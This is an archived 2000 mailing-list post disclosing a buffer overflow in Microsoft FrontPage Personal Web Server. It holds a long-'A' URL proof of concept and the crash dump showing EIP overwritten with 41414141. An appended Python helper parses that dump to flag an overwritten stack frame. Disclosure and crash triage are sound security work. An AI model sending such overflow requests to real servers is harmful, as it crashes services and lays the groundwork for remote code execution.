Vulnerability Development mailing list archives

Re: More vulnerabilities in FP


From: webmad () MAIL RU (Roman)
Date: Mon, 24 Apr 2000 13:41:38 +0200


I don't know, maybe this is already known.
Microsoft FrontPage-PWS 3.0.2.926 contains a buffer
overflow that allows execution of arbitrary code.

http://server/AAAAAAAAAAAAA<a lots of A>AAA

On remote side someone will see:

VHTTPD32 caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
ECX=00fe52c4 DS=016f ESI=00fe7744 FS=404f
EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
Bytes at CS:EIP:

Stack dump:
41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141

Maybe other versions of FP are vulnerable?
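
An added example, not part of the original post: a Python triage helper that parses the fault report quoted above and flags registers holding printable-ASCII fill (0x41 is 'A'), the pattern left when a saved frame pointer and return address are overwritten by request data. The function names and the printable-ASCII heuristic are assumptions of this example.

```python
import re

# Fault report copied from the post above (Windows 9x fault dialog format).
CRASH_REPORT = """\
VHTTPD32 caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
ECX=00fe52c4 DS=016f ESI=00fe7744 FS=404f
EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
Bytes at CS:EIP:

Stack dump:
41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141
"""

REG_RE = re.compile(r"\b([A-Z]{2,5})=([0-9a-fA-F]{4,8})\b")
WORD_RE = re.compile(r"\b[0-9a-fA-F]{8}\b")


def is_printable_fill(word):
    """True if all four bytes of a 32-bit hex word are printable ASCII."""
    raw = bytes.fromhex(word)
    return len(raw) == 4 and all(0x20 <= b <= 0x7E for b in raw)


def triage(report):
    """Heuristic (assumption): EIP and EBP both made of printable ASCII
    means the stack frame was overwritten with text input."""
    head, _, stack = report.partition("Stack dump:")
    regs = dict(REG_RE.findall(head))
    stack_words = WORD_RE.findall(stack)
    # Only 32-bit registers are checked; 16-bit segment registers are skipped.
    tainted = sorted(r for r, v in regs.items()
                     if len(v) == 8 and is_printable_fill(v))
    filled = sum(is_printable_fill(w) for w in stack_words)
    return {
        "tainted_registers": tainted,
        "stack_fill_ratio": filled / len(stack_words) if stack_words else 0.0,
        "likely_stack_overflow": "EIP" in tainted and "EBP" in tainted,
    }


if __name__ == "__main__":
    print(triage(CRASH_REPORT))
```
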

